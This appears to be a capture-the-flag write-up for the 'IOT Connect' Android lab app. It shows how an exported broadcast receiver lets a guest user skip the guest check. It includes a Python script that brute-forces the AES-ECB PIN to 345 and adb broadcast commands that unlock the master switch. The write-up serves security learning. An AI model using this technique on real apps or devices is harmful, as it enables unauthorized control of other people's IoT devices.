IOT Connect

after signing up and logging in the application i found that there is a master switch that requires a PIN to be turned on

when it is wrong it shows this toast message

Let’s take a look about the activity code in jadx

When a pin is entered and the check button is clicked it sends this broadcast message [if the user is not a guest]

now let’s find the broadcast receiver and see how it handles the intent

it is implemented in the class com.mobilehackinglab.iotconnectCommunicationManager

and it expects an intent with:

1. MASTER_ON action

2. extra int key “the pin”

and it takes the key and give access to all devices if the check_key(key) is true

let’s try to send a broadcast

adb shell am broadcast -a MASTER_ON --ei key 555

i got Wrong PIN!! now we bypassed the guest check but we have to find out how the check_key method works?

it returns Intrinsics.areEqual(decrypt(ds, key), "master_on");

This line checks if the decrypted value (decrypt(ds, key)) is equal to the string "master_on". If they are equal, it returns true; otherwise, it returns false.

so we have to find the key that when decrypted with ds give the string master_on

i have written this python script to brute force the key

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

ALGORITHM = "AES"
DS = "OSnaALIWUkpOziVAMycaZQ=="
TARGET_PLAINTEXT = "master_on"

def generate_key(static_key):
    static_key_bytes = str(static_key).encode('utf-8')
    key_bytes = bytearray(16)
    key_bytes[:len(static_key_bytes)] = static_key_bytes[:16]
    return bytes(key_bytes)

def decrypt(ds, key):
    secret_key = generate_key(key)
    cipher = AES.new(secret_key, AES.MODE_ECB)
    ciphertext = base64.b64decode(ds)
    decrypted_bytes = cipher.decrypt(ciphertext)
    plaintext = unpad(decrypted_bytes, AES.block_size).decode('utf-8')
    return plaintext

def find_correct_key():
    for key in range(1000000): 
        try:
            decrypted_text = decrypt(DS, key)
            if decrypted_text == TARGET_PLAINTEXT:
                return key
        except Exception as e:
            continue
    return None

correct_key = find_correct_key()
if correct_key is not None:
    print(f"the key is: {correct_key}")
else:
    print("not found")

the key value is 345

let’s exploit

 adb shell am broadcast -a MASTER_ON --ei key 345